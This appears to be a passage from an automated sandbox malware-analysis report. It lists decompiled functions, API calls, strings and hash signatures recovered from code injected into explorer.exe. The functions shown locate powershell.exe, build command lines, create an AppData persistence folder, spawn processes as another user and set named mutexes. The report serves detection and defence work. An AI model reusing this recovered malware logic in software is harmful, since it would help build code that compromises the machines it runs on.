									_t105 = _t104 + 8;
									while(1) {
										_t95 = E01522020(_t99, _t81, _a4);
										_t100 = _t105 + 4;
										__eflags = _t95 - 0xffffffff;
										if(_t95 != 0xffffffff) {
											__eflags = _t95 - 0xfffffffe;
											if(_t95 != 0xfffffffe) {
												E01524A40(_t79, _t95);
												_t100 = _t100 + 8;
											}
										}
										_t35 = _t95;
										__eflags = _t95 - 0x30;
										if(_t95 < 0x30) {
											break;
										}
										__eflags = _t95 - 0x39;
										if(_t95 <= 0x39) {
											continue;
										}
										break;
									}
									_t78 = _a4;
									L39:
									__eflags = _t35 - 0x45;
									if(_t35 == 0x45) {
										L41:
										_t93 = E01522020(_t99, _t81, _t78);
										_t101 = _t100 + 4;
										__eflags = _t93 - 0xffffffff;
										if(_t93 != 0xffffffff) {
											__eflags = _t93 - 0xfffffffe;
											if(_t93 != 0xfffffffe) {
												_t81 = _t99 + 0x28;
												E01524A40(_t99 + 0x28, _t93);
												_t101 = _t101 + 8;
											}
										}
										__eflags = _t93 - 0x2b;
										if(_t93 == 0x2b) {
											L46:
											_t93 = E01522020(_t99, _t81, _t78);
											_t101 = _t101 + 4;
											__eflags = _t93 - 0xffffffff;
											if(_t93 != 0xffffffff) {
												__eflags = _t93 - 0xfffffffe;
												if(_t93 != 0xfffffffe) {
													E01524A40(_t99 + 0x28, _t93);
													_t101 = _t101 + 8;
												}
											}
										} else {
											__eflags = _t93 - 0x2d;
											if(_t93 == 0x2d) {
												goto L46;
											}
										}
										_t23 = _t93 - 0x30; // -48
										__eflags = _t23 - 9;
										if(_t23 > 9) {
											goto L11;
										} else {
											while(1) {
												_t94 = E01522020(_t99, _t81, _t78);
												_t101 = _t101 + 4;
												__eflags = _t94 - 0xffffffff;
												if(_t94 != 0xffffffff) {
													__eflags = _t94 - 0xfffffffe;
													if(_t94 != 0xfffffffe) {
														_t81 = _t99 + 0x28;
														E01524A40(_t99 + 0x28, _t94);
														_t101 = _t101 + 8;
													}
												}
												_t35 = _t94;
												__eflags = _t94 - 0x30;
												if(_t94 < 0x30) {
													goto L55;
												}
												__eflags = _t94 - 0x39;
												if(_t94 <= 0x39) {
													continue;
												}
												goto L55;
											}
											goto L55;
										}
									} else {
										__eflags = _t35 - 0x65;
										if(_t35 != 0x65) {
											L55:
											E015221B0(_t35, _t99);
											_t45 = E01524A60(_t99 + 0x28, _t99 + 0x28,  &_v16);
											__eflags = _t45;
											if(_t45 == 0) {
												 *(_t99 + 0x40) = _v16;
												 *((intOrPtr*)(_t99 + 0x3c)) = 0x102;
												__eflags = 0;
												return 0;
											} else {
												_push("real number overflow");
												_push(0xf);
												_push(_t78);
												_t48 = E01521F10(_t99) | 0xffffffff;
												__eflags = _t48;
												return _t48;
											}
										} else {
											goto L41;
										}
									}
								}
							} else {
								__eflags = _t35 - 0x45;
								if(_t35 == 0x45) {
									goto L30;
								} else {
									__eflags = _t35 - 0x65;
									if(_t35 == 0x65) {
										goto L30;
									} else {
										E015221B0(_t35, _t99);
										_t62 = E01524960(_t99 + 0x28);
										L015290CC();
										_push(0xa);
										_t91 =  &_v8;
										_push(_t91);
										_push(_t62);
										 *_t62 = 0;
										L015290C6();
										_t80 = _t62;
										_t97 = _t91;
										L015290CC();
										__eflags =  *_t62 - 0x22;
										if( *_t62 != 0x22) {
											 *(_t99 + 0x44) = _t97;
											 *(_t99 + 0x40) = _t80;
											 *((intOrPtr*)(_t99 + 0x3c)) = 0x101;
											__eflags = 0;
											return 0;
										} else {
											__eflags = _t97;
											if(__eflags > 0) {
												L28:
												_push("too big integer");
												_push(0xf);
												_push(_a4);
												_t65 = E01521F10(_t99) | 0xffffffff;
												__eflags = _t65;
												return _t65;
											} else {
												if(__eflags < 0) {
													L27:
													_push("too big negative integer");
													_push(0xf);
													_push(_a4);
													_t68 = E01521F10(_t99) | 0xffffffff;
													__eflags = _t68;
													return _t68;
												} else {
													__eflags = _t80;
													if(_t80 >= 0) {
														goto L28;
													} else {
														goto L27;
													}
												}
											}
										}
									}
								}
							}
						}
					} else {
						L11:
						_t30 = _t93;
						L12:
						return E015221B0(_t30, _t99) | 0xffffffff;
					}
				}
			}

0x015226b0
0x015226b0
0x015226b7
0x015226bb
0x015226be
0x015226c8
0x015226d2
0x015226d4
0x015226da
0x015226e6
0x015226eb
0x015226eb
0x015226ee
0x015226ee
0x015226f3
0x01522738
0x0152273b
0x0152273e
0x00000000
0x01522740
0x01522740
0x01522748
0x0152274a
0x0152274d
0x01522750
0x01522752
0x01522755
0x0152275c
0x01522761
0x01522761
0x01522755
0x01522764
0x01522766
0x01522769
0x00000000
0x00000000
0x00000000
0x0152276b
0x0152276b
0x0152276b
0x00000000
0x01522740
0x015226f5
0x015226fd
0x015226ff
0x01522705
0x0152270c
0x01522711
0x01522716
0x01522716
0x01522719
0x0152271e
0x01522770
0x01522770
0x01522774
0x01522829
0x01522829
0x0152282c
0x00000000
0x00000000
0x00000000
0x00000000
0x0152277a
0x0152277a
0x0152277d
0x0152282e
0x01522836
0x01522839
0x0152283c
0x0152283f
0x0152295d
0x0152295d
0x01522964
0x01522845
0x01522846
0x0152284a
0x0152284f
0x01522852
0x0152285d
0x0152285f
0x01522862
0x01522865
0x01522867
0x0152286a
0x0152286e
0x01522873
0x01522873
0x0152286a
0x01522876
0x01522878
0x0152287b
0x00000000
0x00000000
0x0152287d
0x01522880
0x00000000
0x00000000
0x00000000
0x01522880
0x01522882
0x01522885
0x01522885
0x01522888
0x01522893
0x0152289b
0x0152289d
0x015228a0
0x015228a3
0x015228a5
0x015228a8
0x015228aa
0x015228af
0x015228b4
0x015228b4
0x015228a8
0x015228b7
0x015228ba
0x015228c1
0x015228c9
0x015228cb
0x015228ce
0x015228d1
0x015228d3
0x015228d6
0x015228dd
0x015228e2
0x015228e2
0x015228d6
0x015228bc
0x015228bc
0x015228bf
0x00000000
0x00000000
0x015228bf
0x015228e5
0x015228e8
0x015228eb
0x00000000
0x015228f1
0x015228f1
0x015228f9
0x015228fb
0x015228fe
0x01522901
0x01522903
0x01522906
0x01522908
0x0152290d
0x01522912
0x01522912
0x01522906
0x01522915
0x01522917
0x0152291a
0x00000000
0x00000000
0x0152291c
0x0152291f
0x00000000
0x00000000
0x00000000
0x0152291f
0x00000000
0x015228f1
0x0152288a
0x0152288a
0x0152288d
0x01522921
0x01522923
0x01522930
0x01522938
0x0152293a
0x01522969
0x0152296c
0x01522974
0x0152297a
0x0152293c
0x0152293c
0x01522941
0x01522943
0x0152294e
0x0152294e
0x01522955
0x01522955
0x00000000
0x00000000
0x00000000
0x0152288d
0x01522888
0x01522783
0x01522783
0x01522786
0x00000000
0x0152278c
0x0152278c
0x0152278f
0x00000000
0x01522795
0x01522797
0x015227a0
0x015227a7
0x015227ac
0x015227ae
0x015227b1
0x015227b2
0x015227b3
0x015227b9
0x015227c1
0x015227c3
0x015227c5
0x015227ca
0x015227cd
0x01522813
0x01522817
0x0152281a
0x01522822
0x01522828
0x015227cf
0x015227cf
0x015227d1
0x015227f6
0x015227f9
0x015227fe
0x01522800
0x0152280b
0x0152280b
0x01522812
0x015227d3
0x015227d3
0x015227d9
0x015227dc
0x015227e1
0x015227e3
0x015227ee
0x015227ee
0x015227f5
0x015227d5
0x015227d5
0x015227d7
0x00000000
0x00000000
0x00000000
0x00000000
0x015227d7
0x015227d3
0x015227d1
0x015227cd
0x0152278f
0x01522786
0x0152277d
0x01522725
0x01522725
0x01522725
0x01522727
0x01522737
0x01522737
0x0152271e

APIs

_errno.MSVCRT(?,01523125,?,01522A81,00000000,?,?,?,?,00000000,?,00000000), ref: 015227A7
_strtoi64.MSVCRT(00000000,00000000,0000000A,?,01523125,?,01522A81,00000000,?,?,?,?,00000000,?,00000000), ref: 015227B9
_errno.MSVCRT(?,?,?,?,01523125,?,01522A81,00000000,?,?,?,?,00000000,?,00000000), ref: 015227C5

Strings

too big integer, xrefs: 015227F9
too big negative integer, xrefs: 015227DC
real number overflow, xrefs: 0152293C

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: _errno$_strtoi64
String ID: real number overflow$too big integer$too big negative integer
API String ID: 530688789-1306873797
Opcode ID: 8505d0e2a489207dfe8a5ac1213402b5478476e8cced57b83020d8d9cf9ac232
Instruction ID: fbe0f09c2dc85738e9123a8450ee5ee28a85584b9063aa39e6b39d5c32919fcc
Opcode Fuzzy Hash: 8505d0e2a489207dfe8a5ac1213402b5478476e8cced57b83020d8d9cf9ac232
Instruction Fuzzy Hash: 6B71297F70072213D630A66DACC086E779ABBE7130F180B26F929CF6E0E775D5854692

Uniqueness

Uniqueness Score: 12.89%

Function 003FC710, Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 208
stringUNIQUE

Download Yara Rule

C-Code - Quality: 65%

			E003FC710(void* __ecx, intOrPtr _a4, signed int _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				char _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				int _v72;
				signed int _t73;
				signed int _t75;
				signed int _t89;
				signed int _t96;
				signed int _t97;
				signed int _t101;
				signed int _t106;
				void* _t109;
				signed int _t110;
				WCHAR* _t119;
				signed int _t128;
				signed int _t131;
				signed int _t134;
				void* _t137;
				void* _t138;
				void* _t140;

				_t109 = __ecx;
				_v12 = 0;
				_v8 = 0;
				while(0 != 0) {
				}
				_t73 = E003F3EE0(_t109, 0x412);
				_t138 = _t137 + 4;
				_v12 = _t73;
				__eflags = _v12;
				if(_v12 != 0) {
					_t110 =  *0x411408; // 0x0
					__eflags = _t110 & 0x00000200;
					if(__eflags != 0) {
						L9:
						_v16 = 0;
						_v52 = 0;
						_t112 =  &_v48;
						E003F48B0(__eflags,  &_v48, 7, 0xf, 0x4101bc);
						_t75 = E003F5250(L"PATH");
						_t140 = _t138 + 0x14;
						_v16 = _t75;
						__eflags = _v16;
						if(_v16 == 0) {
							L30:
							__eflags = _v52;
							if(_v52 == 0) {
								while(1) {
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								__eflags = _a8;
								if(_a8 == 0) {
									_v8 = E003F7F40(0, 0x27ee);
								} else {
									_v8 = E003F7F40(0, 0x1cd4);
								}
								_push(_a4);
								E003F3B30(_v12, 0x208, _v8, "C:\Windows");
								L41:
								E003F8170( &_v8);
								while(1) {
									L45:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								return _v12;
							}
							__eflags = _a8;
							if(_a8 == 0) {
								_v8 = E003F7F40(_t112, 0x1912);
							} else {
								_v8 = E003F7F40(_t112, 0x2ad6);
							}
							_push(_a4);
							E003F3B30(_v12, 0x208, _v8, _v52);
							E003F3F10( &_v52, 0xfffffffe);
							goto L41;
						}
						_v60 = 0;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t112 = _v16;
						_t89 = E003F4FD0(_v16, 0x3b, 0,  &_v56);
						_t140 = _t140 + 0x10;
						_v60 = _t89;
						__eflags = _v60;
						if(_v60 == 0) {
							goto L30;
						}
						_v64 = 0;
						_v64 = 0;
						while(1) {
							__eflags = _v64 - _v56;
							if(_v64 >= _v56) {
								goto L30;
							}
							_v68 = 0;
							_v72 = lstrlenW( *(_v60 + _v64 * 4));
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_t119 =  *(_v60 + _v64 * 4);
							_t128 = _v72;
							__eflags = ( *(_t119 + _t128 * 2 - 2) & 0x0000ffff) - 0x5c;
							if(( *(_t119 + _t128 * 2 - 2) & 0x0000ffff) != 0x5c) {
								_push(0);
								_push(L"powershell.exe");
								_push(0x4087f0);
								_t112 = _v64;
								_t96 = E003F4CB0( *(_v60 + _v64 * 4));
								_t140 = _t140 + 0x10;
								_v68 = _t96;
							} else {
								_push(0);
								_push(L"powershell.exe");
								_t112 = _v64;
								_t101 = E003F4CB0( *(_v60 + _v64 * 4));
								_t140 = _t140 + 0xc;
								_v68 = _t101;
							}
							__eflags = _v68;
							if(_v68 == 0) {
								L29:
								_t131 = _v64 + 1;
								__eflags = _t131;
								_v64 = _t131;
								continue;
							} else {
								_t112 = _v68;
								_t97 = E003FE080(_v68, _v68);
								_t140 = _t140 + 4;
								__eflags = _t97;
								if(_t97 == 0) {
									_t112 =  &_v68;
									E003F3F10( &_v68, 0xfffffffe);
									_t140 = _t140 + 8;
									goto L29;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								_v52 = _v68;
								goto L30;
							}
						}
						goto L30;
					}
					_t134 =  *0x411408; // 0x0
					__eflags = _t134 & 0x00004000;
					if(__eflags != 0) {
						goto L9;
					}
					__eflags =  *0x40f764 - 0xa;
					if( *0x40f764 < 0xa) {
						L42:
						__eflags = _a8;
						if(_a8 == 0) {
							E003F3B30(_v12, 0x208, L"\"%s\"", _a4);
						} else {
							E003F3B30(_v12, 0x208, L"\\\"%s\\\"", _a4);
						}
						goto L45;
					}
					_t106 =  *0x411408; // 0x0
					__eflags = _t106 & 0x00000004;
					if(__eflags == 0) {
						goto L42;
					}
					goto L9;
				}
				return 0;
			}

0x003fc710
0x003fc716
0x003fc71d
0x003fc724
0x003fc728
0x003fc72f
0x003fc734
0x003fc737
0x003fc73a
0x003fc73e
0x003fc747
0x003fc74d
0x003fc753
0x003fc77e
0x003fc77e
0x003fc785
0x003fc795
0x003fc799
0x003fc7a6
0x003fc7ab
0x003fc7ae
0x003fc7b1
0x003fc7b5
0x003fc8ba
0x003fc8ba
0x003fc8be
0x003fc915
0x003fc915
0x003fc917
0x00000000
0x00000000
0x003fc919
0x003fc91b
0x003fc91f
0x003fc940
0x003fc921
0x003fc92e
0x003fc92e
0x003fc946
0x003fc959
0x003fc961
0x003fc965
0x003fc9ab
0x003fc9ab
0x003fc9ab
0x003fc9ad
0x00000000
0x00000000
0x003fc9af
0x00000000
0x003fc9b1
0x003fc8c0
0x003fc8c4
0x003fc8e5
0x003fc8c6
0x003fc8d3
0x003fc8d3
0x003fc8eb
0x003fc8fd
0x003fc90b
0x00000000
0x003fc910
0x003fc7bb
0x003fc7c2
0x003fc7c2
0x003fc7c4
0x00000000
0x00000000
0x003fc7c6
0x003fc7d0
0x003fc7d4
0x003fc7d9
0x003fc7dc
0x003fc7df
0x003fc7e3
0x00000000
0x00000000
0x003fc7e9
0x003fc7f0
0x003fc802
0x003fc805
0x003fc808
0x00000000
0x00000000
0x003fc80e
0x003fc825
0x003fc828
0x003fc828
0x003fc82a
0x00000000
0x00000000
0x003fc82c
0x003fc834
0x003fc837
0x003fc83f
0x003fc842
0x003fc862
0x003fc864
0x003fc869
0x003fc86e
0x003fc878
0x003fc87d
0x003fc880
0x003fc844
0x003fc844
0x003fc846
0x003fc84b
0x003fc855
0x003fc85a
0x003fc85d
0x003fc85d
0x003fc883
0x003fc887
0x003fc8b5
0x003fc7fc
0x003fc7fc
0x003fc7ff
0x00000000
0x003fc889
0x003fc889
0x003fc88d
0x003fc892
0x003fc895
0x003fc897
0x003fc8a9
0x003fc8ad
0x003fc8b2
0x00000000
0x00000000
0x00000000
0x00000000
0x003fc899
0x003fc899
0x003fc899
0x003fc89b
0x00000000
0x00000000
0x003fc89d
0x003fc8a2
0x00000000
0x003fc8a2
0x003fc887
0x00000000
0x003fc802
0x003fc755
0x003fc75b
0x003fc761
0x00000000
0x00000000
0x003fc763
0x003fc76a
0x003fc96f
0x003fc96f
0x003fc973
0x003fc9a3
0x003fc975
0x003fc987
0x003fc98c
0x00000000
0x003fc973
0x003fc770
0x003fc775
0x003fc778
0x00000000
0x00000000
0x00000000
0x003fc778
0x00000000

APIs

lstrlenW.KERNEL32(?), ref: 003FC81F

Strings

\"%s\", xrefs: 003FC979
K?, xrefs: 003FC7D0
C:\Windows, xrefs: 003FC947
PATH, xrefs: 003FC7A1
powershell.exe, xrefs: 003FC846, 003FC864
"%s", xrefs: 003FC995

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: "%s"$C:\Windows$K?$PATH$\"%s\"$powershell.exe
API String ID: 1659193697-525262168
Opcode ID: c0de9e1f1f369dde94eb01aa53fc2e857df9f1507b8db0e2e7bcc81c06b8afb6
Instruction ID: 7b1ea6fec51c24536f756069e28772c5251289163f65fe71b7dbaa8e41be5dfa
Opcode Fuzzy Hash: c0de9e1f1f369dde94eb01aa53fc2e857df9f1507b8db0e2e7bcc81c06b8afb6
Instruction Fuzzy Hash: AF71D2B4D5020CFFDB15EF90EA46BBE7774AB44304F109129F6026B282DB749A44CF51

Uniqueness

Uniqueness Score: 100.00%

Function 015199A0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 146UNIQUE

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 015199DF
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 01519A76

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 01519B19
C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown, xrefs: 01519B34
Packages, xrefs: 015199FE
LocalLow, xrefs: 01519A95

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown$LocalLow$Packages
API String ID: 1514166925-1428810533
Opcode ID: 03fe0fa5e4ba8cba9780fb2a38a429adfd909aa8df036810d401d2e74e316bae
Instruction ID: e88c517f292fa30f072e443c4e14102fa78536194ff3e391888a88e99220a415
Opcode Fuzzy Hash: 03fe0fa5e4ba8cba9780fb2a38a429adfd909aa8df036810d401d2e74e316bae
Instruction Fuzzy Hash: 015115B5A80319B6FB35AA509C9AFD97375B758B04F000698B6087E1C9E7F05A84CF91

Uniqueness

Uniqueness Score: 100.00%

Function 01504D6F, Relevance: 10.6, APIs: 7, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E01504D6F(void* __ecx, void* __edi, intOrPtr _a4) {
				int _v8;
				int _v12;
				void _v43;
				char _v44;
				short _v108;
				signed int _t27;
				WCHAR* _t30;
				int _t33;
				intOrPtr _t43;
				intOrPtr _t48;
				intOrPtr _t61;
				signed int _t68;
				intOrPtr* _t70;
				void* _t79;

				_t27 =  *0x1537968; // 0x0
				_v8 = 0;
				_v12 = 0;
				_t30 = E01513960(__ecx, 0x215 + _t27 * 0x214);
				_v8 = _t30;
				if(_t30 != 0) {
					_t61 =  *0x153796c; // 0x0
					 *0x1537984 = _t61;
					lstrcatW(_t30, _a4 + 0x18);
					lstrcatW(_v8, L";0");
					_t70 =  *0x1537984; // 0x0
					if(_t70 == 0) {
						L8:
						_t33 = lstrlenW(_v8);
						_t77 = _t33;
						if(_t33 != 0) {
							_v12 = E0151C010(_v8, _t77 + _t77);
						}
						E01513990( &_v8, _t77 + _t77);
						return _v12;
					}
					do {
						_v44 = 0;
						_t68 = 7;
						memset( &_v43, 0, _t68 << 2);
						_t79 = _t79 + 0xc;
						asm("stosw");
						asm("stosb");
						if( *((intOrPtr*)(_t70 + 0x204)) == 0) {
							lstrcatW(_v8, "|");
							_t43 =  *0x1537984; // 0x0
							lstrcatW(_v8, _t43 + 4);
							lstrcatW(_v8, ";");
							_t48 =  *0x1537984; // 0x0
							E01513F50(0,  *((intOrPtr*)(_t48 + 0x204)),  &_v44, 0xa);
							E01513BA0(0,  &_v108, 0, 0x40);
							E01516E70(0,  &_v44,  &_v108, 0x20);
							_t79 = _t79 + 0x24;
							lstrcatW(_v8,  &_v108);
							_t70 =  *0x1537984; // 0x0
						}
						_t70 =  *_t70;
						 *0x1537984 = _t70;
					} while (_t70 != 0);
					goto L8;
				}
				return 0;
			}

0x01504d75
0x01504d89
0x01504d8c
0x01504d8f
0x01504d95
0x01504d9a
0x01504da3
0x01504da9
0x01504dbe
0x01504dc8
0x01504dca
0x01504dd2
0x01504e67
0x01504e6a
0x01504e70
0x01504e74
0x01504e84
0x01504e84
0x01504e8f
0x00000000
0x01504e99
0x01504dd9
0x01504dd9
0x01504de0
0x01504de4
0x01504de4
0x01504de6
0x01504de8
0x01504def
0x01504df9
0x01504dfb
0x01504e07
0x01504e11
0x01504e19
0x01504e24
0x01504e30
0x01504e3f
0x01504e44
0x01504e4e
0x01504e50
0x01504e50
0x01504e56
0x01504e58
0x01504e5e
0x00000000
0x01504e66
0x00000000

APIs

Part of subcall function 01513960: HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

lstrcatW.KERNEL32(00000000,?), ref: 01504DBE
lstrcatW.KERNEL32(?,0152A3F8), ref: 01504DC8
lstrcatW.KERNEL32(?,0152A3F0), ref: 01504DF9
lstrcatW.KERNEL32(?,-00000004), ref: 01504E07
lstrcatW.KERNEL32(?,0152A3F4), ref: 01504E11
lstrcatW.KERNEL32(?,?), ref: 01504E4E
lstrlenW.KERNEL32(?), ref: 01504E6A

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$AllocHeaplstrlen
String ID:
API String ID: 2086708719-0
Opcode ID: 9d4716ae27614213f6bef91079d1039c8d77d11e7b8457a4c2fe4bd982187fee
Instruction ID: 2d9b0f916ec3e63efecf42f73afdaef0f6a1d557f9b2e7c084152f3eb1a481cf
Opcode Fuzzy Hash: 9d4716ae27614213f6bef91079d1039c8d77d11e7b8457a4c2fe4bd982187fee
Instruction Fuzzy Hash: AD316EB2D04209FFDB12DFA8DD859DEBBB9FB58210F10016AE614EB254D730AA44EB50

Uniqueness

Uniqueness Score: 1.18%

Function 003F4400, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106processUNIQUE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 003F443A
EqualSid.ADVAPI32(00000000,?), ref: 003F447A
memset.MSVCRT(?,00000000,000001FE), ref: 003F44A4
CreateProcessAsUserW.ADVAPI32(00000000,00000000,003FEC10,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?), ref: 003F44F9
CloseHandle.KERNEL32(00000000), ref: 003F452A

Strings

D, xrefs: 003F44C2

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseCreateEqualErrorHandleLastProcessUsermemset
String ID: D
API String ID: 764747229-2746444292
Opcode ID: ac88b6bdca65c3dc5bab0509e992325d42075434ad0e20127a92435c6f516445
Instruction ID: dd1d99f62f0a028f23e8838e4703c59a3147c663be7a3dd8354b873abcb5eedb
Opcode Fuzzy Hash: ac88b6bdca65c3dc5bab0509e992325d42075434ad0e20127a92435c6f516445
Instruction Fuzzy Hash: 0A31A774A0430DEBDF11DFA1DD85BBF7779AB44704F204528E709BB290EA749A40CB51

Uniqueness

Uniqueness Score: 23.02%

Function 01510E52, Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E01510E52(signed char* _a4, intOrPtr _a8, char _a12, char _a16) {
				void* _t19;
				void* _t23;
				signed char* _t25;
				signed char* _t30;
				void* _t31;
				int _t34;
				void* _t37;
				void* _t41;
				char _t46;
				signed char* _t47;
				void* _t49;

				_t34 = 0x40;
				if(_a16 == 0x30) {
					_t34 = _t34 + 0x40;
				}
				_t46 = _a12;
				if(_t46 > _t34) {
					_push("crypto\\digest\\hmac.c");
					_push("psAssert %s");
					_t31 = E01510CBC(_t19);
					_push(0x121);
					_push(":%d ");
					E01510CBC(_t31);
					E01510B84("keyLen <= (uint32)padLen");
					_t49 = _t49 + 0x14;
				}
				_t47 = _a4;
				if(_t46 != 0) {
					_t30 = _t47;
					_t41 = _a8 - _t47;
					_a12 = _t46;
					do {
						_t42 =  *(_t41 + _t30) ^ 0x00000036;
						 *_t30 =  *(_t41 + _t30) ^ 0x00000036;
						_t30 =  &(_t30[1]);
						_t7 =  &_a12;
						 *_t7 = _a12 - 1;
					} while ( *_t7 != 0);
				}
				if(_t46 < _t34) {
					memset( &(_t47[_t46]), 0x36, _t34 - _t46);
					_t49 = _t49 + 0xc;
				}
				_push( &(_t47[0x80]));
				if(_a16 != 0x30) {
					E0151333C();
					_t23 = E015133B8( &(_t47[0x80]), _t47, _t34);
				} else {
					E0151308C();
					_push(_t34);
					_push(_t47);
					_t23 = E0151313D(_t42,  &(_t47[0x80]));
				}
				if(_t46 != 0) {
					_t25 = _t47;
					_t37 = _a8 - _t47;
					_a16 = _t46;
					do {
						 *_t25 = _t25[_t37] ^ 0x0000005c;
						_t25 =  &(_t25[1]);
						_t17 =  &_a16;
						 *_t17 = _a16 - 1;
					} while ( *_t17 != 0);
				}
				if(_t46 < _t34) {
					return memset( &(_t47[_t46]), 0x5c, _t34 - _t46);
				}
				return _t23;
			}

0x01510e5e
0x01510e5f
0x01510e61
0x01510e61
0x01510e64
0x01510e69
0x01510e6b
0x01510e70
0x01510e75
0x01510e7a
0x01510e7f
0x01510e84
0x01510e8e
0x01510e93
0x01510e93
0x01510e96
0x01510e9b
0x01510ea0
0x01510ea2
0x01510ea4
0x01510ea7
0x01510eaa
0x01510ead
0x01510eaf
0x01510eb0
0x01510eb0
0x01510eb0
0x01510ea7
0x01510eb7
0x01510ec4
0x01510ec9
0x01510ec9
0x01510ed6
0x01510ed7
0x01510eee
0x01510efc
0x01510ed9
0x01510ed9
0x01510ede
0x01510ee5
0x01510ee7
0x01510ee7
0x01510f06
0x01510f0b
0x01510f0d
0x01510f0f
0x01510f12
0x01510f18
0x01510f1a
0x01510f1b
0x01510f1b
0x01510f1b
0x01510f12
0x01510f22
0x00000000
0x01510f31
0x01510f38

APIs

memset.MSVCRT(?,00000036,00000040), ref: 01510EC4
memset.MSVCRT(?,0000005C,00000040), ref: 01510F2C

Strings

psAssert %s, xrefs: 01510E70
0, xrefs: 01510ECC
:%d , xrefs: 01510E7F
keyLen <= (uint32)padLen, xrefs: 01510E89
crypto\digest\hmac.c, xrefs: 01510E6B

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memset
String ID: 0$:%d $crypto\digest\hmac.c$keyLen <= (uint32)padLen$psAssert %s
API String ID: 2221118986-3185564530
Opcode ID: ffd648c975c6405dd70a17e3f0492d23852891ef550065535cf1323eedccde48
Instruction ID: 8132e2733fc86195b8911f46d0837d6b37758fd47f5057089d4366879c18ad6a
Opcode Fuzzy Hash: ffd648c975c6405dd70a17e3f0492d23852891ef550065535cf1323eedccde48
Instruction Fuzzy Hash: 0F216872600347ABFF23BE698C85EAF7B19BFE4210F04041EF9554F2CAE9719444C6A1

Uniqueness

Uniqueness Score: 8.94%

Function 003F17D0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 69
UNIQUE

Download Yara Rule

C-Code - Quality: 32%

			E003F17D0() {
				void _v131;
				char _v132;
				void _v195;
				char _v196;
				int _v200;
				char _t13;
				char _t29;

				_t13 =  *0x40f6d9; // 0x0
				_v196 = _t13;
				memset( &_v195, 0, 0x3f);
				_t29 =  *0x40f6da; // 0x0
				_v132 = _t29;
				memset( &_v131, 0, 0x7f);
				_v200 = 0;
				while(1) {
					_t27 = 0;
					if(0 == 0) {
						break;
					}
				}
				_push(GetCurrentProcessId());
				E003F3AC0( &_v196, 0x40, "2%s%u", "jkfkdm");
				if(E003F71D0(0,  &_v196) != 0) {
					while(1) {
						_t27 = 0;
						if(0 == 0) {
							goto L6;
						}
					}
				}
				L6:
				_push(0);
				_push("jkfkdm");
				E003F4D50(0x40e02c,  &_v132, 0x104, "Global");
				_v200 = E003F7130(_t27,  &_v132);
				if(_v200 != 0) {
					while(0 != 0) {
					}
					E003F7170(0, _v200, 0x3a98);
				}
				return 1;
			}

0x003f17d9
0x003f17de
0x003f17ef
0x003f17f7
0x003f17fd
0x003f1808
0x003f1810
0x003f181a
0x003f181a
0x003f181c
0x00000000
0x00000000
0x003f181e
0x003f1826
0x003f183a
0x003f1853
0x003f1855
0x003f1855
0x003f1857
0x00000000
0x00000000
0x003f1859
0x003f1855
0x003f185b
0x003f185b
0x003f185d
0x003f1875
0x003f1889
0x003f1896
0x003f1898
0x003f189c
0x003f18aa
0x003f18af
0x003f18ba

APIs

memset.MSVCRT(?,00000000,0000003F), ref: 003F17EF
memset.MSVCRT(?,00000000,0000007F), ref: 003F1808
GetCurrentProcessId.KERNEL32 ref: 003F1820

Strings

Global, xrefs: 003F1862
jkfkdm, xrefs: 003F1827, 003F185D
2%s%u, xrefs: 003F182C

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: memset$CurrentProcess
String ID: 2%s%u$Global$jkfkdm
